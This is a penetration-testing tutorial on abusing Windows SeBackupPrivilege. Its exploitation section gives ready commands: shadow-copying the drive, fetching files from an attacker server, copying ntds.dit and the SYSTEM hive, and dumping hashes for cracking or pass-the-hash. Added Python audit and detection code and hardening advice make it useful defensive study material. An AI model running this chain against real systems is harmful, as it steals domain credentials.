Windows PrivEsc with SeBackupPrivilege
Last modified: 2023-02-08
SeBackupPrivilege lets a user read any file on the system regardless of its NTFS permissions (backup semantics), which is why holding it is a path to privilege escalation.
Investigation
First, check whether the current user holds SeBackupPrivilege in the privileges section of the output.
whoami /all
If so, we can read any file on the system, including the SAM and SYSTEM registry hives (and NTDS.dit on a domain controller).
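To triage this check across many hosts, or from a collected `whoami /all` dump, the following added Python example (not part of the original page) parses the privileges table and reports whether SeBackupPrivilege is held. The sample output is constructed, and the function names are my own.

```python
import re

# Constructed sample of `whoami /priv` output from a low-privileged account
# that is a member of Backup Operators (not captured from a real host).
SAMPLE_WHOAMI = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeBackupPrivilege             Back up files and directories        Disabled
SeRestorePrivilege            Restore files and directories        Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""

# One table row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege name: state} from `whoami /priv` or `whoami /all` output."""
    # `whoami /all` also prints USER and GROUP sections; only parse the privilege table.
    marker = "PRIVILEGES INFORMATION"
    if marker in text:
        text = text.split(marker, 1)[1]
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def backup_privilege_state(text):
    """None if the token does not hold SeBackupPrivilege, else 'Enabled' or 'Disabled'.

    'Disabled' still means the privilege is held: a process of this user can
    enable it in its own token, so it counts as a finding for an audit."""
    return parse_privileges(text).get("SeBackupPrivilege")


if __name__ == "__main__":
    state = backup_privilege_state(SAMPLE_WHOAMI)
    print("SeBackupPrivilege:", state if state else "not held")
```

From the defensive side, the fix is not to disable the privilege in the token but to remove the account from the groups that grant it (by default Administrators and Backup Operators, plus Server Operators on domain controllers) or from the "Back up files and directories" user right assignment.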
Exploitation
1. Create a Payload
Create “diskshadow.txt” on the local machine. The script refers to this.
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:
Then transfer the file to the target machine.
Before that, create a “tmp” folder in the root of the target's system drive, since the script writes its metadata file to C:\tmp.
mkdir \tmp
cd \tmp
For example, on the target machine:
# [Option 1] PowerShell (we need to start a web server on the local machine first)
PS> Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt
# [Option 2] In evil-winrm
PS> upload diskshadow.txt
2. Execute DiskShadow.Exe
Then run diskshadow.exe with the script:
# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt
3. Upload Malicious DLL
We can download the two DLL files from here.
# In evil-winrm
PS> upload SeBackupPrivilegeUtils.dll
PS> upload SeBackupPrivilegeCmdLets.dll
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll
# h: is the drive letter exposed by the diskshadow script above
PS> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
# the SYSTEM hive holds the boot key needed to decrypt ntds.dit
PS> reg save HKLM\SYSTEM c:\tmp\system
PS> download ntds.dit
PS> download system
4. Dump Password Hashes
Now we have the two files (ntds.dit and system) on the local machine and can extract the password hashes from them offline:
impacket-secretsdump -ntds ntds.dit -system system LOCAL
After that, crack the hashes or use them for pass-the-hash.
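From the defender's side, every step of the chain above leaves a process-creation record (Security event 4688 or Sysmon Event ID 1). The following added Python example, which is not part of the original page or of any tool it references, scores such records for the stages of this chain and raises one alert when a single user hits two or more stages within a short window. The event dicts, their field names (`time`, `user`, `image`, `cmdline`), the sample events and the 30-minute window are constructed assumptions about a SIEM export.

```python
import re
from datetime import datetime, timedelta

# Process-creation events as a SIEM export might hand them over. Constructed
# sample data, not real telemetry; the field names are an assumption.
SAMPLE_EVENTS = [
    {"time": "2023-02-08T10:00:00", "user": "CORP\\backupsvc",
     "image": "C:\\Windows\\System32\\diskshadow.exe",
     "cmdline": "diskshadow.exe /s .\\diskshadow.txt"},
    {"time": "2023-02-08T10:01:10", "user": "CORP\\backupsvc",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -c \"Import-Module .\\SeBackupPrivilegeCmdLets.dll; "
                "Copy-FileSeBackupPrivilege h:\\windows\\ntds\\ntds.dit c:\\tmp\\ntds.dit -overwrite\""},
    {"time": "2023-02-08T10:02:00", "user": "CORP\\backupsvc",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save HKLM\\SYSTEM c:\\tmp\\system"},
    # Routine administration: a lone hive export with no other stage nearby.
    {"time": "2023-02-08T12:00:00", "user": "CORP\\itops",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save HKLM\\SYSTEM c:\\backup\\system.hiv"},
    {"time": "2023-02-08T12:30:00", "user": "CORP\\itops",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save HKLM\\SOFTWARE c:\\backup\\software.hiv"},
]

# Each stage of the chain, as a predicate over the lower-cased image path and
# command line. Any one stage alone is a weak signal; several together are not.
STAGE_RULES = {
    # diskshadow driven by a script file (/s) rather than interactively
    "diskshadow_script": lambda img, cmd: img.endswith("diskshadow.exe")
                                          and re.search(r"\s/s(\s|$)", cmd) is not None,
    # export of a credential-bearing hive (SYSTEM holds the boot key)
    "hive_export": lambda img, cmd: img.endswith("reg.exe")
                                    and re.search(r"\bsave\s+hklm\\(system|sam|security)\b", cmd) is not None,
    # the SeBackupPrivilege cmdlet DLLs being loaded or used
    "backup_cmdlet": lambda img, cmd: "sebackupprivilege" in cmd,
    # any command line that names the AD database file
    "ntds_dit": lambda img, cmd: "ntds.dit" in cmd,
}


def match_stages(event):
    """Return the list of stage names a single event matches (may be several)."""
    img = event.get("image", "").lower()
    cmd = event.get("cmdline", "").lower()
    return [name for name, rule in STAGE_RULES.items() if rule(img, cmd)]


def detect_chain(events, window=timedelta(minutes=30), min_stages=2):
    """Group stage hits per user into time clusters; alert on clusters that
    cover at least `min_stages` distinct stages."""
    hits = []
    for ev in events:
        stages = match_stages(ev)
        if stages:
            hits.append((datetime.fromisoformat(ev["time"]), ev["user"], stages))
    hits.sort(key=lambda h: (h[1], h[0]))  # by user, then by time

    alerts, cluster = [], None
    for ts, user, stages in hits:
        if cluster and cluster["user"] == user and ts - cluster["first"] <= window:
            cluster["stages"].update(stages)
            cluster["last"] = ts
        else:
            if cluster and len(cluster["stages"]) >= min_stages:
                alerts.append(cluster)
            cluster = {"user": user, "first": ts, "last": ts, "stages": set(stages)}
    if cluster and len(cluster["stages"]) >= min_stages:
        alerts.append(cluster)
    return alerts


if __name__ == "__main__":
    for a in detect_chain(SAMPLE_EVENTS):
        print(f"ALERT {a['user']}: stages {sorted(a['stages'])} "
              f"between {a['first']} and {a['last']}")
```

On the sample data only the `CORP\backupsvc` cluster fires; the `CORP\itops` hive export stays a single weak signal. Two complementary sources are worth wiring into the same rule: the logon event 4672 ("Special privileges assigned to new logon"), which lists SeBackupPrivilege for accounts outside the known backup service accounts, and PowerShell script block logging (event 4104), which records the `Import-Module` of the cmdlet DLLs even when the command line is obfuscated. The preventive control is keeping Backup Operators membership to a minimum and reviewing it regularly.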